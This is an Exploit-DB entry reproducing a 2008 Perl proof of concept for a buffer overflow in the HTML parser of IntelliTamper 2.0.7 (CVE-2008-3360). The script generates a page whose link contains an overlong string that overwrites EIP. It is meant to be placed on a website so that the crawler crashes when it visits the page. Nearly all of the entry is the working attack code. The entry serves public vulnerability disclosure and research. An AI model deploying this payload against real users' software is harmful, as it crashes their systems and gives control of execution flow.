IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (PoC)
Author: Guido Landi type: dos platform: windows port: date_added: 2008-07-20 date_updated: verified: 1 codes: OSVDB-48285;CVE-2008-3360 tags: aliases: screenshot_url: application_url: http://www.exploit-db.comintellitamper_v2.07.exe raw file: 6103.pl
#!/usr/bin/perl # # k`sOSe - 07/21/2008 # # This is NOT http://secunia.com/advisories/20172/. # There are some BOFs in the html parser, just put a properly # formatted html file in your website and launch IntelliTamper against it. use warnings; use strict; my $evil_html = '<html><head><title>ph33r</title></head><body>' . '<a href="http://google.it/' . "\x41" x 450 . "\x42" x 4 . # EIP '.htm">ph33r</a>' . "</body></html>"; print $evil_html; # milw0rm.com [2008-07-21]